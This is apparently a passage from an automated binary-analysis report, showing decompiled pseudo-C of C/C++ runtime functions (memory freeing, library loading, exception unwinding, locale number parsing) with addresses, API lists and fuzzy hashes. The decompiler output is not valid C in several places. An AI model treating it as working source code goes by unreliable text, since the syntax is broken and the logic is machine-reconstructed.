								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0041693B(_t56, _t59, _v12);
							E004155C5(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00413C2D())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00413C2D()));
			}

0x00424001
0x0042400b
0x0042400e
0x00424015
0x0042401c
0x00424021
0x00424024
0x0042402a
0x0042403d
0x00424044
0x00424047
0x00424049
0x0042404c
0x00000000
0x00000000
0x00424052
0x00424052
0x00424054
0x00424057
0x00424059
0x0042405c
0x0042413a
0x0042413a
0x0042413c
0x004240f3
0x004240fb
0x00424105
0x00424108
0x00424189
0x00424189
0x0042418b
0x00000000
0x0042418b
0x0042410a
0x0042410f
0x00000000
0x0042410f
0x0042413e
0x00424144
0x0042414c
0x00424153
0x00424156
0x00424159
0x00000000
0x00000000
0x00424163
0x00424169
0x0042416b
0x00000000
0x00000000
0x00424172
0x00424178
0x00424185
0x00000000
0x00424185
0x00424140
0x00424142
0x00000000
0x00000000
0x00000000
0x00424142
0x00424062
0x0042406c
0x00424078
0x0042407b
0x0042407c
0x0042407e
0x0042409c
0x0042409f
0x004240a2
0x004240a3
0x004240a3
0x004240a5
0x004240b8
0x004240b8
0x004240ba
0x004240bd
0x004240c2
0x004240c5
0x004240c8
0x00424113
0x00424118
0x0042411b
0x00424122
0x00424122
0x00424128
0x00424128
0x00424130
0x00424136
0x00000000
0x00424136
0x004240ca
0x004240cb
0x004240cd
0x004240d0
0x004240d2
0x004240d5
0x004240d7
0x004240b1
0x004240b1
0x00000000
0x004240b1
0x004240d9
0x00000000
0x00000000
0x00000000
0x004240d9
0x004240a7
0x00000000
0x00000000
0x004240a9
0x004240af
0x00000000
0x00000000
0x00000000
0x004240db
0x004240db
0x004240db
0x004240e3
0x004240e9
0x004240ee
0x004240f1
0x004240f1
0x00000000
0x004240f1
0x00424085
0x00000000
0x00424085
0x00424064
0x00424066
0x00000000
0x00000000
0x00000000
0x00424066
0x0042402c
0x00000000

APIs

_free.LIBCMT ref: 00424130

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4072ea2803856ad7ea7179ef2b6f3443f208724ef49708b2bf964a2635becdd9
Instruction ID: 98b7450e220d165711acab3f376938553dca11d2c3ff47be4ef1eeb78f62cd82
Opcode Fuzzy Hash: 4072ea2803856ad7ea7179ef2b6f3443f208724ef49708b2bf964a2635becdd9
Instruction Fuzzy Hash: AA413D32700120AAD7207EBAAC49AFF3AA9EFD1774F54011BF514D6391EA7C49D142AE

Uniqueness

Uniqueness Score: -1.00%

Function 00419E6F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00419E6F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x439c80 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x42caf8 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf2c84917
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00419e74
0x00419e78
0x00419e7f
0x00419e83
0x00419e91
0x00419ea7
0x00419eab
0x00419ed4
0x00419ed6
0x00419eda
0x00419edd
0x00419edd
0x00419ee3
0x00419ee5
0x00000000
0x00419ee6
0x00419ead
0x00419eb6
0x00419ec5
0x00419eb8
0x00419ebb
0x00419ec1
0x00419ec1
0x00419ec9
0x00000000
0x00419ecb
0x00419ece
0x00419ed0
0x00000000
0x00419ed0
0x00419ec9
0x00419e85
0x00419e8a
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00419E16,?,00000000,00000000,00000000,?,0041A080,00000006,FlsSetValue), ref: 00419EA1
GetLastError.KERNEL32(?,00419E16,?,00000000,00000000,00000000,?,0041A080,00000006,FlsSetValue,0042CFD4,0042CFDC,00000000,00000364,?,00418D43), ref: 00419EAD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00419E16,?,00000000,00000000,00000000,?,0041A080,00000006,FlsSetValue,0042CFD4,0042CFDC,00000000), ref: 00419EBB

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 82bf409128d75a24d029df979840f37312c2e5aa3ec14f0796288ed2a94d0f2e
Instruction ID: 023a4d825dbb1922e45e6c038fb57888e71481d09ae5bf6262971d41764bd4fb
Opcode Fuzzy Hash: 82bf409128d75a24d029df979840f37312c2e5aa3ec14f0796288ed2a94d0f2e
Instruction Fuzzy Hash: 0401D4327153239BC731CA68EC54AE77798AF05BA1B600231F906D32C0DB35DC42C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C29A, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040C29A(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E0040C8E9(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0040CF9F(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E0040CAEB(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0040C0A4(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0040CF6D(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x0040c29a
0x0040c29a
0x0040c29d
0x0040c2a2
0x0040c2a5
0x0040c2a7
0x0040c2aa
0x0040c2ad
0x0040c2ae
0x0040c2b1
0x0040c2b6
0x0040c2b6
0x0040c2b9
0x0040c2bd
0x0040c2c0
0x0040c2c5
0x0040c2c2
0x0040c2c2
0x0040c2c2
0x0040c2c8
0x0040c2ce
0x0040c2d1
0x0040c2d3
0x0040c2d6
0x0040c2d9
0x0040c2da
0x0040c2e3
0x0040c2e8
0x0040c2eb
0x0040c2f1
0x0040c2f4
0x0040c2f7
0x0040c2fa
0x0040c2fb
0x0040c2fe
0x0040c309
0x0040c30d
0x00000000
0x0040c30d
0x0040c314

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040C2B1

Part of subcall function 0040C8E9: ___AdjustPointer.LIBCMT ref: 0040C933

_UnwindNestedFrames.LIBCMT ref: 0040C2C8
___FrameUnwindToState.LIBVCRUNTIME ref: 0040C2DA
CallCatchBlock.LIBVCRUNTIME ref: 0040C2FE

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 9afe44ab99225f6ea999e8d2db0325fa6e36c05469cbb3720c38e87c18da837e
Instruction ID: edea1abf0e695ec9f89d2d4da17e3d8fd07a31b00c1e50a03772e8dc5987b1e8
Opcode Fuzzy Hash: 9afe44ab99225f6ea999e8d2db0325fa6e36c05469cbb3720c38e87c18da837e
Instruction Fuzzy Hash: EB011E32400109FBCF125F95CC81EDA3B76EF48754F04822AFD18711A1C379E861EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFC, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00402BFC(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t25;
				intOrPtr _t30;
				void* _t32;
				void* _t37;

				_t39 = __fp0;
				_t37 = __eflags;
				_t25 = __edx;
				E00424FAC(E00425FA3, __ecx, __edi, __esi, _t32, __fp0);
				_push(__esi);
				_push(__edi);
				_t30 = __ecx;
				 *((intOrPtr*)(_t32 - 0x18)) = __ecx;
				 *((intOrPtr*)(_t32 - 0x14)) = 0;
				if(E00402B64(__ecx, _t25, _t37) == 0) {
					GetModuleFileNameW(0, _t32 - 0x220, 0x104);
				} else {
					 *(_t32 - 0x10) = 0x104;
					__imp__QueryFullProcessImageNameW(GetCurrentProcess(), 0, _t32 - 0x220, _t32 - 0x10);
				}
				E00403428(_t30, _t39, _t32 - 0x220);
				 *((intOrPtr*)(_t32 - 4)) = 0;
				 *((intOrPtr*)(_t32 - 0x14)) = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return _t30;
			}

0x00402bfc
0x00402bfc
0x00402bfc
0x00402c01
0x00402c0c
0x00402c0d
0x00402c0e
0x00402c12
0x00402c15
0x00402c1f
0x00402c50
0x00402c21
0x00402c24
0x00402c3b
0x00402c3b
0x00402c5f
0x00402c64
0x00402c6a
0x00402c75
0x00402c7f

APIs

__EH_prolog.LIBCMT ref: 00402C01

Part of subcall function 00402B64: new.LIBCMT ref: 00402B73
Part of subcall function 00402B64: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00402B8D
Part of subcall function 00402B64: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00402B99

GetCurrentProcess.KERNEL32(00000000,?,?), ref: 00402C34
QueryFullProcessImageNameW.KERNEL32(00000000), ref: 00402C3B
GetModuleFileNameW.KERNEL32(00000000,00000104,00000104), ref: 00402C50

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ModuleNameProcess$AddressCurrentFileFullH_prologHandleImageProcQuery
String ID:
API String ID: 482649687-0
Opcode ID: 7a63c626af1053ead1d007fd633c9c6b5996b0f650a89b0514dc50b8ea33b317
Instruction ID: cb68a2abf18ad0000de9efdec360142fb361dfee5489a7eddd53f6f71a3228c7
Opcode Fuzzy Hash: 7a63c626af1053ead1d007fd633c9c6b5996b0f650a89b0514dc50b8ea33b317
Instruction Fuzzy Hash: EF014871A041199BDB10DF95D9499FEB7BCFB44704F40006BF504E3191C7784A458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2F6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F2F6() {
				void* _t4;
				void* _t8;

				E0040F37A();
				E0040F0D6();
				if(E0040F66E() != 0) {
					_t4 = E0040F46F(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0040F6AA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0040f2f6
0x0040f2fb
0x0040f307
0x0040f30c
0x0040f311
0x0040f313
0x0040f31e
0x0040f315
0x0040f315
0x00000000
0x0040f315
0x0040f309
0x0040f309
0x0040f30b
0x0040f30b

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0040F2F6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0040F2FB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0040F300

Part of subcall function 0040F66E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040F67F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0040F315

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: db87d026be21fd579648e7ffff208c4dac3bbefe435e7dbb1d6cf337ad1a5e50
Instruction ID: 1fdad1abfc0a41c777a25bcf26553eaf83efebe39eab792ffe34a6b471a60f8c
Opcode Fuzzy Hash: db87d026be21fd579648e7ffff208c4dac3bbefe435e7dbb1d6cf337ad1a5e50
Instruction Fuzzy Hash: D0C0021404024090DC307AB221126AE23001CA27EC79028BBEC8076ED3A97F040F582F

Uniqueness

Uniqueness Score: -1.00%

Function 004069F8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004069F8(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* __ebx;
				intOrPtr* _t121;
				void* _t123;
				signed int _t125;
				intOrPtr _t133;
				char* _t134;
				void* _t144;
				void* _t146;
				char _t155;
				void* _t160;
				void* _t165;
				char* _t180;
				signed int _t185;
				char* _t187;
				void* _t195;
				void* _t196;
				void* _t198;
				intOrPtr* _t202;
				void* _t224;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t229;
				signed int _t230;
				intOrPtr* _t233;
				intOrPtr _t234;
				void* _t237;
				void* _t242;

				_t285 = __fp0;
				_t242 = __eflags;
				_t228 = __edi;
				_t224 = __edx;
				E00424FAC(E00426320, __ecx, __edi, __esi, _t237, __fp0);
				_push(__esi);
				_push(__edi);
				_push( *((intOrPtr*)(_t237 + 0x1c)));
				_t233 = E0040828F(__ecx, _t224, __edi, __esi, _t242, __fp0);
				_push(_t237 - 0x54);
				_t190 = _t233;
				E00407507(_t233);
				 *(_t237 - 4) =  *(_t237 - 4) & 0x00000000;
				_t243 =  *((intOrPtr*)(_t237 - 0x44));
				if( *((intOrPtr*)(_t237 - 0x44)) != 0) {
					_t190 = _t233;
					 *((char*)(_t237 - 0xd)) =  *((intOrPtr*)( *_t233 + 0x10))();
				} else {
					 *((char*)(_t237 - 0xd)) = 0;
				}
				_t121 = E00407DBF(_t190, _t224, _t228, _t233, _t243, _t285);
				 *((intOrPtr*)( *_t121 + 0x1c))("0123456789ABCDEFabcdef-+Xx", 0x43380b, _t237 - 0x70,  *((intOrPtr*)(_t237 + 0x1c)));
				_t234 =  *((intOrPtr*)(_t237 + 0x10));
				_t180 =  *((intOrPtr*)(_t237 + 0xc));
				 *((intOrPtr*)(_t237 - 0x14)) = _t180;
				_t123 = E00408646(_t234,  *((intOrPtr*)(_t237 + 0x14)));
				if(_t123 != 0) {
					L13:
					_t125 =  *(_t237 + 0x18) & 0x00000e00;
					_t229 = 0xa;
					asm("sbb ebx, ebx");
					 *(_t237 - 0x20) = _t229;
					_t195 = 0x10;
					_t184 =  ==  ? _t195 :  ~_t125 & _t229;
					_t196 = 8;
					_t185 =  ==  ? _t196 :  ==  ? _t195 :  ~_t125 & _t229;
					 *(_t237 - 0x1c) = _t185;
					 *((char*)(_t237 + 0x1b)) = 0;
					 *((char*)(_t237 - 0x18)) = 0;
					 *((char*)(_t237 - 0xe)) = 0;
					E00408646(_t234,  *((intOrPtr*)(_t237 + 0x14)));
					if(0 != 0) {
						L28:
						_t198 = 8;
						L29:
						__eflags = _t185;
						if(_t185 == 0) {
							L32:
							_push( *((intOrPtr*)(_t237 - 0x18)));
							 *((intOrPtr*)(_t237 - 0x2c)) = 0;
							 *((intOrPtr*)(_t237 - 0x28)) = 0;
							 *((intOrPtr*)(_t237 - 0x28)) = 0xf;
							 *((intOrPtr*)(_t237 - 0x2c)) = 0;
							 *((char*)(_t237 - 0x3c)) = 0;
							E00405AA3(_t237 - 0x3c, _t285, 1);
							 *(_t237 - 4) = 1;
							_t230 = 0;
							 *((intOrPtr*)(_t237 - 0x24)) =  *((intOrPtr*)(_t237 + 0xc)) + 0x1f;
							if(E00408646(_t234,  *((intOrPtr*)(_t237 + 0x14))) != 0) {
								L55:
								_t133 =  *((intOrPtr*)(_t237 + 0x1b));
								L56:
								_t202 =  >=  ?  *((void*)(_t237 - 0x54)) : _t237 - 0x54;
								if(_t133 == 0) {
									L67:
									_t134 =  *((intOrPtr*)(_t237 + 0xc));
									L68:
									 *_t134 = 0;
									 *(_t237 - 4) = 0;
									E0040593A(_t237 - 0x3c, 1, 0);
									_t110 = _t237 - 4;
									 *_t110 =  *(_t237 - 4) | 0xffffffff;
									__eflags =  *_t110;
									E0040593A(_t237 - 0x54, 1, 0);
									 *[fs:0x0] =  *((intOrPtr*)(_t237 - 0xc));
									return _t185;
								}
								while(_t230 != 0) {
									_t226 =  *_t202;
									if(_t226 == 0x7f) {
										break;
									}
									_t230 = _t230 - 1;
									if(_t230 == 0) {
										L61:
										if(_t230 != 0) {
											L63:
											if( *((char*)(_t202 + 1)) > 0) {
												_t202 = _t202 + 1;
											}
											continue;
										}
										_t141 =  >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c;
										_t283 = _t226 -  *((intOrPtr*)( >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c));
										if(_t226 <  *((intOrPtr*)( >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c))) {
											goto L67;
										}
										goto L63;
									}
									_t139 =  >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c;
									if(_t226 !=  *((intOrPtr*)(( >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c) + _t230))) {
										goto L67;
									}
									goto L61;
								}
								__eflags =  *((char*)(_t237 - 0xe));
								_t134 =  *((intOrPtr*)(_t237 - 0x14));
								if( *((char*)(_t237 - 0xe)) == 0) {
									 *_t134 = 0x30;
									_t134 = _t134 + 1;
								}
								goto L68;
							}
							_t187 =  *((intOrPtr*)(_t237 - 0x14));
							do {
								if( *((char*)(_t234 + 4)) == 0) {
									E00407D4F(_t234);
								}
								 *((char*)(_t237 - 0x18)) =  *((intOrPtr*)(_t234 + 5));
								_t144 = E004084D3(_t237 - 0x70,  *((intOrPtr*)(_t237 - 0x18)));
								if(_t144 >=  *(_t237 - 0x20)) {
									__eflags =  *((intOrPtr*)(_t237 - 0x28)) - 0x10;
									_t146 =  >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c;
									__eflags =  *((char*)(_t146 + _t230));
									if( *((char*)(_t146 + _t230)) == 0) {
										break;
									}
									__eflags =  *((char*)(_t237 - 0xd));
									if( *((char*)(_t237 - 0xd)) == 0) {
										break;
									}
									__eflags =  *((char*)(_t234 + 4));
									if( *((char*)(_t234 + 4)) == 0) {
										E00407D4F(_t234);
									}
									__eflags =  *((intOrPtr*)(_t234 + 5)) -  *((intOrPtr*)(_t237 - 0xd));
									if( *((intOrPtr*)(_t234 + 5)) !=  *((intOrPtr*)(_t237 - 0xd))) {
										break;
									} else {
										_push(0);
										E00405C00(_t187, _t237 - 0x3c, _t285, 1);
										_t230 = _t230 + 1;
										__eflags = _t230;
										goto L49;
									}
								} else {
									_t155 =  *((intOrPtr*)(_t144 + "0123456789ABCDEFabcdef-+Xx"));
									 *_t187 = _t155;
									if( *((char*)(_t237 - 0xe)) != 0 || _t155 != 0x30) {
										if(_t187 <  *((intOrPtr*)(_t237 - 0x24))) {
											_t187 = _t187 + 1;
											 *((char*)(_t237 - 0xe)) = 1;
										}
									}
									_t227 =  *((intOrPtr*)(_t237 - 0x3c));
									 *((char*)(_t237 + 0x1b)) = 1;
									_t157 =  >=  ? _t227 : _t237 - 0x3c;
									if( *((char*)(( >=  ? _t227 : _t237 - 0x3c) + _t230)) != 0x7f) {
										_t159 =  >=  ? _t227 : _t237 - 0x3c;
										 *((char*)(( >=  ? _t227 : _t237 - 0x3c) + _t230)) =  *((char*)(( >=  ? _t227 : _t237 - 0x3c) + _t230)) + 1;
									}
								}
								L49:
								E00407D73(_t234);
							} while (E00408646(_t234,  *((intOrPtr*)(_t237 + 0x14))) == 0);
							 *((intOrPtr*)(_t237 - 0x14)) = _t187;
							_t185 =  *(_t237 - 0x1c);
							if(_t230 == 0) {
								goto L55;
							}
							_t148 =  >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c;
							if( *((char*)(( >=  ?  *((void*)(_t237 - 0x3c)) : _t237 - 0x3c) + _t230)) <= 0) {
								_t133 = 0;
								goto L56;
							}
							_t230 = _t230 + 1;
							goto L55;
						}
						__eflags = _t185 - _t229;
						if(_t185 == _t229) {
							goto L32;
						}
						L31:
						_t160 = 0x16;
						_t161 =  ==  ? _t198 : _t160;
						 *(_t237 - 0x20) =  ==  ? _t198 : _t160;
						goto L32;
					}
					if( *((intOrPtr*)(_t234 + 4)) == 0) {
						E00407D4F(_t234);
					}
					if( *((intOrPtr*)(_t234 + 5)) !=  *((intOrPtr*)(_t237 - 0x70))) {
						goto L28;
					} else {
						 *((char*)(_t237 + 0x1b)) = 1;
						 *((char*)(_t237 - 0x18)) = 1;
						E00407D73(_t234);
						_t165 = E00408646(_t234,  *((intOrPtr*)(_t237 + 0x14)));
						if(1 != 0) {
							L27:
							__eflags = _t185;
							_t198 = 8;
							_t185 =  ==  ? _t198 : _t185;
							 *(_t237 - 0x1c) = _t185;
							goto L29;
						}
						if( *((intOrPtr*)(_t234 + 4)) == _t165) {
							E00407D4F(_t234);
						}
						if( *((intOrPtr*)(_t234 + 5)) ==  *((intOrPtr*)(_t237 - 0x57))) {
							L24:
							if(_t185 == 0 || _t185 == 0x10) {
								_t185 = 0x10;
								 *(_t237 - 0x1c) = _t185;
								 *((char*)(_t237 + 0x1b)) = 0;
								 *((char*)(_t237 - 0x18)) = 0;
								E00407D73(_t234);
								_t198 = 8;
								goto L31;
							} else {
								goto L27;
							}
						} else {
							if( *((char*)(_t234 + 4)) == 0) {
								E00407D4F(_t234);
							}
							if( *((intOrPtr*)(_t234 + 5)) !=  *((intOrPtr*)(_t237 - 0x58))) {
								goto L27;
							} else {
								goto L24;
							}
						}
					}
				} else {
					if( *((intOrPtr*)(_t234 + 4)) == _t123) {
						E00407D4F(_t234);
					}
					if( *((intOrPtr*)(_t234 + 5)) !=  *((intOrPtr*)(_t237 - 0x59))) {
						__eflags =  *((char*)(_t234 + 4));
						if( *((char*)(_t234 + 4)) == 0) {
							E00407D4F(_t234);
						}
						__eflags =  *((intOrPtr*)(_t234 + 5)) -  *((intOrPtr*)(_t237 - 0x5a));
						if( *((intOrPtr*)(_t234 + 5)) !=  *((intOrPtr*)(_t237 - 0x5a))) {
							goto L13;
						} else {
							 *_t180 = 0x2d;
							goto L12;
						}
					} else {
						 *_t180 = 0x2b;
						L12:
						 *((intOrPtr*)(_t237 - 0x14)) = _t180 + 1;
						E00407D73(_t234);
						goto L13;
					}
				}
			}

0x004069f8
0x004069f8
0x004069f8
0x004069f8
0x004069fd
0x00406a06
0x00406a07
0x00406a08
0x00406a10
0x00406a16
0x00406a17
0x00406a19
0x00406a1e
0x00406a22
0x00406a26
0x00406a30
0x00406a35
0x00406a28
0x00406a28
0x00406a28
0x00406a3b
0x00406a53
0x00406a59
0x00406a5e
0x00406a61
0x00406a64
0x00406a6b
0x00406aab
0x00406aae
0x00406ab9
0x00406aba
0x00406abc
0x00406ac8
0x00406ac9
0x00406ad3
0x00406ad7
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406af1
0x00406b81
0x00406b83
0x00406b84
0x00406b84
0x00406b86
0x00406b97
0x00406b97
0x00406b9f
0x00406ba2
0x00406ba7
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb9
0x00406bc2
0x00406bca
0x00406bd4
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc9
0x00406ccf
0x00406d1a
0x00406d1a
0x00406d1d
0x00406d1f
0x00406d21
0x00406d2a
0x00406d2f
0x00406d2f
0x00406d2f
0x00406d3a
0x00406d47
0x00406d51
0x00406d51
0x00406cd1
0x00406cd5
0x00406cda
0x00000000
0x00000000
0x00406cdc
0x00406cdf
0x00406cf0
0x00406cf2
0x00406d02
0x00406d06
0x00406d08
0x00406d08
0x00000000
0x00406d06
0x00406cfa
0x00406cfe
0x00406d00
0x00000000
0x00000000
0x00000000
0x00406d00
0x00406ce7
0x00406cee
0x00000000
0x00000000
0x00000000
0x00406cee
0x00406d0b
0x00406d0f
0x00406d12
0x00406d14
0x00406d17
0x00406d17
0x00000000
0x00406d12
0x00406bda
0x00406bdd
0x00406be1
0x00406be5
0x00406be5
0x00406bed
0x00406bf7
0x00406c01
0x00406c46
0x00406c4d
0x00406c51
0x00406c55
0x00000000
0x00000000
0x00406c57
0x00406c5b
0x00000000
0x00000000
0x00406c5d
0x00406c61
0x00406c65
0x00406c65
0x00406c6d
0x00406c70
0x00000000
0x00406c72
0x00406c72
0x00406c79
0x00406c7e
0x00406c7e
0x00000000
0x00406c7e
0x00406c03
0x00406c07
0x00406c0d
0x00406c0f
0x00406c18
0x00406c1a
0x00406c1b
0x00406c1b
0x00406c18
0x00406c25
0x00406c2b
0x00406c2f
0x00406c36
0x00406c3e
0x00406c41
0x00406c41
0x00406c36
0x00406c7f
0x00406c81
0x00406c90
0x00406c9b
0x00406c9e
0x00406ca3
0x00000000
0x00000000
0x00406cab
0x00406cb3
0x00406cb8
0x00000000
0x00406cb8
0x00406cb5
0x00000000
0x00406cb5
0x00406b88
0x00406b8a
0x00000000
0x00000000
0x00406b8c
0x00406b90
0x00406b91
0x00406b94
0x00000000
0x00406b94
0x00406afa
0x00406afe
0x00406afe
0x00406b09
0x00000000
0x00406b0b
0x00406b0f
0x00406b12
0x00406b15
0x00406b1f
0x00406b26
0x00406b74
0x00406b76
0x00406b78
0x00406b79
0x00406b7c
0x00000000
0x00406b7c
0x00406b2b
0x00406b2f
0x00406b2f
0x00406b3a
0x00406b51
0x00406b53
0x00406b60
0x00406b61
0x00406b64
0x00406b67
0x00406b6a
0x00406b71
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b3c
0x00406b40
0x00406b44
0x00406b44
0x00406b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b4f
0x00406b3a
0x00406a6d
0x00406a70
0x00406a74
0x00406a74
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8e
0x00406a8e
0x00406a96
0x00406a99
0x00000000
0x00406a9b
0x00406a9b
0x00000000
0x00406a9b
0x00406a81
0x00406a81
0x00406a9e
0x00406aa3
0x00406aa6
0x00000000
0x00406aa6
0x00406a7f

APIs

__EH_prolog.LIBCMT ref: 004069FD

Part of subcall function 0040828F: __EH_prolog.LIBCMT ref: 00408294
Part of subcall function 0040828F: std::_Lockit::_Lockit.LIBCPMT ref: 004082A3
Part of subcall function 0040828F: std::locale::_Getfacet.LIBCPMT ref: 004082C3
Part of subcall function 0040828F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040831D

Part of subcall function 00407507: __EH_prolog.LIBCMT ref: 0040750C

_Find_elem.LIBCPMT ref: 00406BF7

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00406A4E

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Lockitstd::_$Find_elemGetfacetLockit::_Lockit::~_std::locale::_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 706924740-2799312399
Opcode ID: f177471b1ff4ad13c74581efb97c8c745c16d6c2a72487336cb8e196657a4cde
Instruction ID: 242786c11d81711688fd8bb5e9d288e384018ee32d6f589d452456780cace00f
Opcode Fuzzy Hash: f177471b1ff4ad13c74581efb97c8c745c16d6c2a72487336cb8e196657a4cde
Instruction Fuzzy Hash: A2C1F430E082889EEF159FA4C4407EEBBB19F15304F65806FE4927B3C2CB789955CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004153BD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041544D

Strings

pow, xrefs: 00415425, 00415442

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 926aed831fdfe8e31aadb1ad94b034d7cbfcfb72685e36cbe4ab9d7bd54bd2fe
Instruction ID: bc335f69a6d1408b56554d617e2c97e839ca0cf94b2a3b16b91df897b5386c32
Opcode Fuzzy Hash: 926aed831fdfe8e31aadb1ad94b034d7cbfcfb72685e36cbe4ab9d7bd54bd2fe
Instruction Fuzzy Hash: 78516FF1E04A01D6CB117B14DD413EB3B909B90742F608D6BE4D6463E9EB3C8CD69A8E

Uniqueness

